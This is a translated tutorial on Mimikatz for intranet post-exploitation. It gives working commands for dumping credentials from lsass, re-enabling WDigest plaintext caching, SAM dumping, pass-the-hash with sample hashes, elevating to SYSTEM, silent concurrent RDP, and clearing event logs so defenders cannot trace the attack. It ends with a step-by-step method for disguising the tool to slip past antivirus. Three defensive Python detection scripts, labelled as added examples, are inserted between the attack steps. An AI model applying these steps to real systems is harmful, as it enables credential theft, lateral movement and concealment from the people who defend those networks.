Intranet penetration and post-exploitation [Network Security]

0x01 Tool Introduction

Tool principle

The core principle of Mimikatz is that after a user logs in to Windows, the system keeps the user's credentials in the memory of the lsass.exe process. Mimikatz opens lsass.exe, reads its process memory, and recovers the corresponding plaintext password from it.

FAQ

Since Windows Vista the LM hash is no longer stored, and since Windows 8.1 plaintext passwords are no longer kept in memory, so on newer Windows versions Mimikatz cannot read plaintext passwords directly. The key to Mimikatz obtaining plaintext passwords is WDigest, which keeps credentials in a reversibly encrypted form. The relevant registry location is:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest, value UseLogonCredential (REG_DWORD)

Newer Windows versions cannot read plaintext because this registry value is turned off. To recover plaintext, turn the value on and have the user log in again with their password:

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
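For defenders the practical use of this registry value is the reverse of the command above: confirm that UseLogonCredential is 0 or absent on every host and alert when it changes. As an added example, not code from the original post, the following Python parses captured `reg query` output for this key, classifies the host, and prints the command that restores the secure setting. The sample output and build numbers are constructed; the KB2871997 note applies to the pre-8.1 versions that need that update before the value has any effect.

```python
r"""Audit the WDigest UseLogonCredential setting from 'reg query' output.

Added example, not from the original post. It parses the text printed by
    reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
so it runs offline against captured output; on a live host the same text
can be fed in from subprocess. The sample output below is constructed.
"""
import re

WDIGEST_KEY = r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
VALUE_NAME = "UseLogonCredential"
# NT build 9600 = Windows 8.1 / Server 2012 R2, the first versions that do
# not cache plaintext WDigest credentials unless this value is set to 1.
FIRST_SAFE_BUILD = 9600

# Constructed sample: what 'reg query' prints after the value was enabled.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
    Debuglevel    REG_DWORD    0x0
    Negotiate    REG_DWORD    0x0
    UTF8HTTP    REG_DWORD    0x1
    UTF8SASL    REG_DWORD    0x1
    DigestEncryptionAlgorithms    REG_SZ    3des,rc4
    UseLogonCredential    REG_DWORD    0x1
"""

_VALUE_LINE = re.compile(r"^\s*(\S+)\s+(REG_[A-Z_]+)\s+(.*?)\s*$")


def parse_reg_query(text):
    """Return {value_name: (reg_type, data)} for each value line in the output."""
    values = {}
    for line in text.splitlines():
        match = _VALUE_LINE.match(line)
        if match:
            values[match.group(1)] = (match.group(2), match.group(3))
    return values


def use_logon_credential(values):
    """Return UseLogonCredential as an int, or None if the value is absent."""
    entry = values.get(VALUE_NAME)
    if entry is None or entry[0] != "REG_DWORD":
        return None
    return int(entry[1], 16)


def assess(values, build):
    """Classify whether lsass.exe will keep reversible WDigest credentials.

    build is the Windows NT build number of the host (e.g. 7601, 9600, 19045).
    """
    setting = use_logon_credential(values)
    if setting == 1:
        return "RISK: UseLogonCredential=1, plaintext credentials cached"
    if build >= FIRST_SAFE_BUILD:
        return "OK: plaintext caching disabled by default"
    # Older builds cache plaintext unless KB2871997 is installed and the
    # value is explicitly 0; the value alone proves nothing without the update.
    if setting == 0:
        return "OK only if KB2871997 is installed"
    return "RISK: older build without UseLogonCredential=0"


def remediation():
    """The command that restores the secure setting (value 0)."""
    return f"reg add {WDIGEST_KEY} /v {VALUE_NAME} /t REG_DWORD /d 0 /f"


if __name__ == "__main__":
    parsed = parse_reg_query(SAMPLE_REG_OUTPUT)
    print(assess(parsed, build=19045))
    print(remediation())
```

Because a value of 1 is never needed for normal operation, the cleanest monitoring rule is simply "this value exists and is not 0"; pairing the audit with a registry-change alert on the key catches the moment it is switched on rather than the next scheduled scan.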


0x02 Basic usage

Common usage

Mimikatz requires administrator or SYSTEM privileges to run. It ships in 32-bit and 64-bit versions; in Kali Linux it is stored by default under /usr/share/mimikatz. Most people only ever use two Mimikatz commands and know little about the rest, so what follows is a more comprehensive introduction to the tool.

privilege::debug
sekurlsa::logonpasswords

Output can also be produced with a single command line and redirected to a file:

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit" > password.txt
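Both forms above work by opening a handle to lsass.exe and reading its memory, which is also what makes them visible: Sysmon Event ID 10 (ProcessAccess) records every such handle together with the access mask that was granted. As an added example, not code from the original post, the Python below ranks constructed Sysmon-style records by the rights granted on lsass.exe and by where the requesting process lives. The field names follow Sysmon and the access-right constants are the documented Windows values; the sample records, paths and the list of expected source directories are assumptions.

```python
"""Rank Sysmon Event ID 10 (ProcessAccess) records that open lsass.exe.

Added example, not from the original post. The records below are
constructed JSON lines using the Sysmon field names (SourceImage,
TargetImage, GrantedAccess); a SIEM export would supply the real ones.
The access-mask constants are the documented Windows process rights.
"""
import json

PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
# Reading lsass memory (what a credential dump needs) requires VM_READ;
# writing to it or creating threads in it indicates injection.
READ_MASK = PROCESS_VM_READ
WRITE_MASK = PROCESS_VM_WRITE | PROCESS_CREATE_THREAD

# Source paths whose reads of lsass are expected (AV, WMI, system binaries).
# This only lowers severity for triage; it is not an allowlist.
EXPECTED_SOURCE_DIRS = (
    "c:\\windows\\system32\\",
    "c:\\programdata\\microsoft\\windows defender\\",
)

# Constructed sample records.
SAMPLE_EVENTS = [
    r'{"EventID": 10, "SourceImage": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18\\MsMpEng.exe", "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1400"}',
    r'{"EventID": 10, "SourceImage": "C:\\Users\\alice\\Downloads\\m.exe", "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1010"}',
    r'{"EventID": 10, "SourceImage": "C:\\Windows\\system32\\svchost.exe", "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1000"}',
    r'{"EventID": 10, "SourceImage": "C:\\Windows\\Temp\\x.exe", "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1fffff"}',
    r'{"EventID": 10, "SourceImage": "C:\\Windows\\system32\\wbem\\WmiPrvSE.exe", "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1410"}',
    r'{"EventID": 1, "Image": "C:\\Windows\\system32\\notepad.exe"}',
]


def classify(event):
    """Return 'info', 'medium' or 'high' for an lsass access, else None."""
    if event.get("EventID") != 10:
        return None
    if not event.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return None
    access = int(event["GrantedAccess"], 16)
    if access & WRITE_MASK:
        return "high"          # injection-capable handle, whatever the source
    if not access & READ_MASK:
        return "info"          # query-only handle (Task Manager, monitoring)
    source = event.get("SourceImage", "").lower()
    if source.startswith(EXPECTED_SOURCE_DIRS):
        return "medium"        # memory read from an expected location
    return "high"              # memory read from a user-writable path


def scan(lines):
    """Parse JSON lines and return [(severity, source_image), ...]."""
    findings = []
    for line in lines:
        event = json.loads(line)
        severity = classify(event)
        if severity:
            findings.append((severity, event["SourceImage"]))
    return findings


if __name__ == "__main__":
    for severity, source in scan(SAMPLE_EVENTS):
        print(f"{severity:6} {source}")
```

The mask 0x1010 (VM_READ with QUERY_LIMITED_INFORMATION) is the minimum a memory read needs and is the one to watch; 0x1fffff (all access) from an unexpected path is unambiguous. Only the source path lowers the severity, and only to "medium", because a binary dropped into a system directory would otherwise disappear from the queue.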

Basic syntax

List all function modules with the command:

::

Request the debug privilege for the current process (needed to read other processes, including lsass.exe):

privilege::debug
privilege::        # lists the commands in the privilege module

Enable logging so that the credential information that is read is saved to a file:

standard::log

0x03 Common modules

Crypto module

The crypto module is mainly used to export certificates, including ones marked non-exportable, and accesses them through the CryptoAPI functions; it is roughly a simplified certutil. A legitimate certificate is sometimes very useful: a program signed with one may be treated as allowlisted by anti-virus software and not flagged. The relevant parameters are as follows:

/provider        #Specify the provider
/providertype    #Specify the provider type
/cngprovider     #Specify the CNG provider
/export          #Export the private key as a PVK file

View the providers for the associated keys:

crypto::providers

View the certificate stores on the current system:

crypto::stores

Common system store names include:

  • CURRENT_USER

  • USER_GROUP_POLICY

  • LOCAL_MACHINE

  • LOCAL_MACHINE_GROUP

  • LOCAL_MACHINE_ENTERPRISE

  • CURRENT_SERVICE

  • USERS

  • SERVICES

Specify the system store local_machine and view its stores:

crypto::stores /systemstore:local_machine

View the current user's certificates:

crypto::certificates

View the certificates in the Root store, the first step in exporting the root certificate:

crypto::certificates /store:Root

The certificate to export must be selected with the matching /store parameter. The public key is written as a DER file, the private key as a PFX file, and the PFX password is mimikatz:

crypto::certificates /store:Root /export

Patch CryptoAPI; if a certificate cannot be exported, it is usually because this patch has not been applied:

crypto::capi

Patch CNG so that keys not marked as exportable can be exported:

crypto::cng

List smart card readers (an error may appear):

crypto::sc

View the related keys:

crypto::keys

Convert the exported PVK private key to PEM with OpenSSL:

openssl rsa -inform PVK -in key.pvk -outform PEM -out key.pem

Sekurlsa module

The sekurlsa module extracts passwords, keys, PINs, tickets and other credential material from the lsass.exe process and is the most commonly used module. View all authentication data and obtain the user's plaintext password:

sekurlsa::logonpasswords

Errors may occur when dumping the user hashes, mainly because the current privileges are too low:

lsadump::sam

The fix is simple: run with SYSTEM privileges:

process::runp

Run the command again in the new window and the hashes are obtained successfully.

Resetting a user's NTLM hash writes the hash directly into the SAM database, so the operation is equivalent to resetting the password, and the user must log in again with the new password:

lsadump::setntlm /user:admin /ntlm:b2781ba85ac750ec286744b009599637

Work from a dumped lsass.exe process (a minidump file) instead of the live process:

sekurlsa::minidump lsass.tmp

Lateral movement via pass-the-hash

sekurlsa::pth /user:admin /domain:host1 /ntlm:b2781ba85ac750ec286744b009599637
sekurlsa::pth /user:admin /domain:host1 /aes256:b2781ba85ac750ec286744b009599637

Saved Windows credentials can be viewed in Credential Manager.

Token module

The token module is mainly used to view and impersonate existing tokens. View the current token:

token::whoami

List the available tokens and impersonate SYSTEM:

token::list
token::elevate /NT AUTHORITY\SYSTEM

Revert to the original token:

token::revert

Other modules

Normally, logging in to Remote Desktop a second time either logs out the user already logged in or prompts that another user is logged in.

With the following command you can log in to Remote Desktop silently alongside the existing session. This is very useful in HW exercises: even if the administrator is logged in, other users can still log in quietly:

ts::multirdp

After a successful login the original session is not affected; list the sessions with:

ts::sessions

Although the logged-in user cannot currently notice this, logon records still remain in the Event Viewer.

Clear the log with one command:

event::clear

After the log is cleared, a blue team engineer can no longer reconstruct the attack from the system log alone.
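The two steps above (an extra RDP session, then clearing the log) only erase the evidence that was never forwarded: clearing the Security log itself writes Event ID 1102 ("audit log cleared"), and a copy of the earlier 4624 logons survives in a SIEM or a forwarding collector. As an added example, not code from the original post, the Python below correlates constructed Security events: it flags more than one concurrent RDP session on a host and raises an alert whenever the log is cleared, naming any RDP logons from the preceding 30 minutes. The event IDs and field names are the standard Windows ones; the records, users, addresses and the 30-minute window are constructed assumptions.

```python
"""Correlate Security-log clearing (Event ID 1102) with RDP activity.

Added example, not from the original post. The records are constructed
JSON-lines approximations of Windows Security events: 4624 (logon, with
LogonType 10 = RemoteInteractive), 4634 (logoff) and 1102 (audit log
cleared). Real records would come from a SIEM or forwarded event log.
"""
import json
from datetime import datetime, timedelta

LOGON_TYPE_RDP = 10
RDP_WINDOW = timedelta(minutes=30)   # how far back to look for RDP logons

# Constructed sample records (timestamps are ISO 8601).
SAMPLE_EVENTS = [
    '{"t": "2024-05-01T09:00:00", "EventID": 4624, "LogonType": 10, "TargetUserName": "admin", "TargetLogonId": "0x3e7a1", "IpAddress": "10.0.0.5"}',
    '{"t": "2024-05-01T09:02:00", "EventID": 4624, "LogonType": 10, "TargetUserName": "svc_backup", "TargetLogonId": "0x3f0c2", "IpAddress": "10.0.0.77"}',
    '{"t": "2024-05-01T09:10:00", "EventID": 1102, "SubjectUserName": "svc_backup"}',
    '{"t": "2024-05-01T09:15:00", "EventID": 4634, "TargetLogonId": "0x3f0c2"}',
    '{"t": "2024-05-01T13:00:00", "EventID": 1102, "SubjectUserName": "SYSTEM"}',
]


def parse(lines):
    """Decode JSON lines, convert timestamps and sort chronologically."""
    events = []
    for line in lines:
        event = json.loads(line)
        event["t"] = datetime.fromisoformat(event["t"])
        events.append(event)
    return sorted(events, key=lambda e: e["t"])


def analyse(events):
    """Return [(severity, message), ...] in time order."""
    alerts = []
    active_rdp = {}      # TargetLogonId -> user, for sessions not yet logged off
    rdp_logons = []      # (time, user, ip) kept for the correlation window
    for event in events:
        eid = event["EventID"]
        if eid == 4624 and event.get("LogonType") == LOGON_TYPE_RDP:
            active_rdp[event["TargetLogonId"]] = event["TargetUserName"]
            rdp_logons.append((event["t"], event["TargetUserName"], event.get("IpAddress")))
            if len(active_rdp) > 1:
                users = ", ".join(sorted(active_rdp.values()))
                alerts.append(("medium", f"{len(active_rdp)} concurrent RDP sessions: {users}"))
        elif eid == 4634:
            active_rdp.pop(event.get("TargetLogonId"), None)
        elif eid == 1102:
            recent = [(u, ip) for t, u, ip in rdp_logons if event["t"] - t <= RDP_WINDOW]
            msg = f"security log cleared by {event['SubjectUserName']}"
            if recent:
                who = ", ".join(f"{u}@{ip}" for u, ip in recent)
                msg += f" within {RDP_WINDOW} of RDP logon(s) by {who}"
            alerts.append(("high", msg))
    return alerts


if __name__ == "__main__":
    for severity, message in analyse(parse(SAMPLE_EVENTS)):
        print(f"{severity:6} {message}")
```

A cleared log is always a high-severity event on its own; the correlation only adds the context (who was connected, from where) that the local log no longer holds. The session count is a weaker signal, since some hosts legitimately allow several RDP users, so it is reported at medium severity for a human to judge.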

Install or remove the Mimikatz service, which helps capture user input:

service::+
service::-

The Mimikatz service is installed and starts automatically.

For example, monitoring text placed on the clipboard:

misc::clip

0x04 AV evasion (anti-kill)

As the most commonly used hacking tool, Mimikatz has long been flagged by the major security products, such as 360 Antivirus, 360 Security Guard and Kaspersky. Modifying the source code can help bypass anti-virus detection. This is signature-based evasion: locate the signatured parts of the source and modify them. There are generally three places to look: code, strings and the import table.

Prepare the environment

The following three things are needed before starting:

  • Mimikatz source code

  • Visual Studio 2019 (C++)

  • vc dependency file

Download the latest version of Mimikatz from GitHub.

Download address: https://github.com/gentilkiwi/mimikatz

Update 360 Antivirus and its virus database to the latest version.

Configuration issues

Open the solution file in the Mimikatz source to start Visual Studio, then enter the licence under Help > About > View license status to activate it. If VS 2012 reports error MSB8020, go to Project > Properties > General > Platform Toolset, change the toolset to VS 2012 (v110), and the build succeeds.

If the build fails with that error, click Tools > Get Tools and Features > Desktop development with C++ > Windows XP support for C++ (VS 2017 v141 tools), then click Modify to resolve it.

After the download and installation complete, change the platform toolset to the 2017 version.

Set Treat Warnings As Errors to No under Configuration Properties > C/C++, otherwise the build fails on every warning.

Rebuild; error MSB8036 appears (the configured Windows SDK version was not found).

Select an installed SDK version in the project property page.

After clicking Rebuild, the 32-bit Mimikatz compiles successfully.

To build a 64-bit program, select x64 as the platform under Solution > Configuration Properties.

Click Rebuild to compile the 64-bit Mimikatz.

The evasion process

Getting to the point: in the mimikatz project, open the editor's Find and Replace > Replace in Files.

Replace every occurrence of the keyword mimikatz with macsec and click Replace All.

Because all the strings were replaced, the file names referenced as mimikatz were replaced too, so every file name must also be renamed to macsec.

Click Rebuild to produce macsec.exe.

Although this now passes static scanning, it still cannot bypass dynamic detection.

Next, delete the comments in macsec.c and macsec.h.

Rebuild the program and test with 360 again; dynamic detection is still not bypassed.

Modify the version information in macsec.rc, changing the company name from gentilkiwi to macsec.

Change the icon macsec.ico to the Office Word icon and build again.

Run it again in the test environment; this time it bypasses detection.

Of course, the commands also execute successfully.

After finishing the evasion work you could upload the binary to a cloud multi-scanner platform to test it, but generally this is not done, because such platforms will flag the evaded program.